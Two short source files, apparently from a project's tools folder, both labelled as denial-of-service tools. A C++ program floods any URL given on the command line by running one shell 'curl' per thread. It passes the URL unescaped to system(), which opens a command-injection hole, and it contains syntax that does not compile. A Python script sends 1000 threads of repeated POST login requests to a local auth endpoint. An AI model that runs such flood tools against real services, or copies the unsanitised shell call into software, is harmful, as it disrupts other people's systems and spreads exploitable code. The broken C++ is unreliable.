File: tools/dos.cpp
#include <iostream>
#include <string>
#include <thread>


using namespace std;

// function to hit an endpoint
void hit_endpoint(string url, int num_requests) {
    for (int i = 0; i < num_requests; i++) {
        try{
          system(("curl " + url).c_str());
        }
        catch(){
          cout << "Error" << endl;
        }
    }
}

//using threads to hit an endpoint
void hit_endpoint_thread(string url, int num_requests) {
    thread t[num_requests];
    for (int i = 0; i < num_requests; i++) {
        t[i] = thread(hit_endpoint, url, 1);
    }
    for (int i = 0; i < num_requests; i++) {
        t[i].join();
    }
}

// main function
int main(int argc, char *argv[]) {
    // check if the number of arguments is correct
    if (argc != 3) {
        cout << "Usage: ./dos <url> <num_requests>" << endl;
        return 1;
    }

    // get the url and number of requests
    string url = argv[1];
    int num_requests = atoi(argv[2]);

    // hit the endpoint
    hit_endpoint_thread(url, num_requests);

    return 0;
}

File: tools/dos.py
# hit an endpoint with a DOS attack

import requests
import threading
import time

# number of threads to spawn
THREADS = 1000

# number of times to hit the endpoint
HITS = 100

# endpoint to hit
ENDPOINT = "http://localhost:3000/auth/login"

# METHOD
METHOD = "POST"

# URL FORM ENCODED DATA
DATA = {'email': 2, 'password': '123123123Aa'}


def hit_endpoint():
    for i in range(HITS):
        try:
            requests.request(METHOD, ENDPOINT, data=DATA)
        except Exception as e:
            print("{} failed in thread {}".format(
                i, threading.current_thread().name))


def main():
    for i in range(THREADS):
        t = threading.Thread(target=hit_endpoint)
        t.start()

    for t in threading.enumerate():
        if t != threading.current_thread():
            t.join()

    print("Done!")


if __name__ == "__main__":
    main()
